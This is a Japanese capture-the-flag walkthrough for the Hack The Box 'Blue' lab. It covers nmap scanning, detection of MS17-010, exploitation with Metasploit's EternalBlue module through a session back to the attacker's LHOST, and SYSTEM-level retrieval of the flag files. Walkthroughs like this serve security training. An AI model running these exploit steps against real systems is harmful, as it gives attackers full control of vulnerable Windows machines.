0.はじめに
hacktheboxのBlue攻略方法です。
始めてhacktheboxに取り組むならいい題材かと思います。
nmap、Metasploitがどんな感じなのかというのを体験できるはずです。
1.nmapでポートスキャン
nmap -sT 10.10.10.40
②ポートの詳細を確認
135、139、445についてポートの詳細を確認してみます。
nmap -sC -sV -sT -p 135,139,445 10.10.10.40
445ポート(SMB)の確認結果から以下がわかります。
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
→やけに古いOSが出て来るので脆弱性がないか調べてみます。
2.脆弱性の調査
①SMB(445ポート)の脆弱性がないかnmapで引き続き確認
nmap -sT -p 445 10.10.10.40 -script=smb-vuln*
確認結果から以下の脆弱性が判明
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
IDs: CVE:CVE-2017-0143
3.ターゲットへの侵入
①Metasploitの起動
msfconsole -q
②Metasploit内に「ms17-010」のモジュールがないか検索
search ms17-010
沢山ヒットしましたが今回はターゲットがWindows7であることから
「exploit/windows/smb/ms17_010_eternalblue _ target: Windows 7」を使用します。
③モジュールの選択
「exploit/windows/smb/ms17_010_eternalblue _ target: Windows 7」は今回の検索結果だと「2」なので以下のように指定
use 2
④オプション項目確認
show options
今回はRHOST(ターゲット)、LHOST(自端末)を設定します。
⑤オプション項目確認
set rhosts 10.10.10.40
set lhost 10.10.16.8
show options
⑥モジュールの実行
run
4.ターゲットへの侵入後の調査
①Metasploitシェルの情報を確認
getsystem
sysinfo
getuid
getuidの実行結果が「Server username: NT AUTHORITY\SYSTEM」なので既にこのターゲット上では何でも出来る状態です。
②ユーザフラグの取得
cd C:/Users
dir
一般ユーザにはharisユーザがいると判明します。
→このユーザのデスクトップにユーザフラグがあるはずなので確認します。
cd haris/Desktop
dir
cat user.txt
windowsがターゲットの場合、フラグファイルは各ユーザのデスクトップにあります。
ユーザフラグ
c:/Users/xxx/Desktop/user.txt
ルートフラグ
c:/Users/Administrator/Desktop/root.txt
③ルートフラグの取得
cd C:/Users/Administrator/Desktop
dir
cat root.txt
5.おわりに
あんまり普段は意識して使わないnmapのscriptオプションを使ってみました。
複雑じゃない題材なので積極的色々な機能を試してほしいです。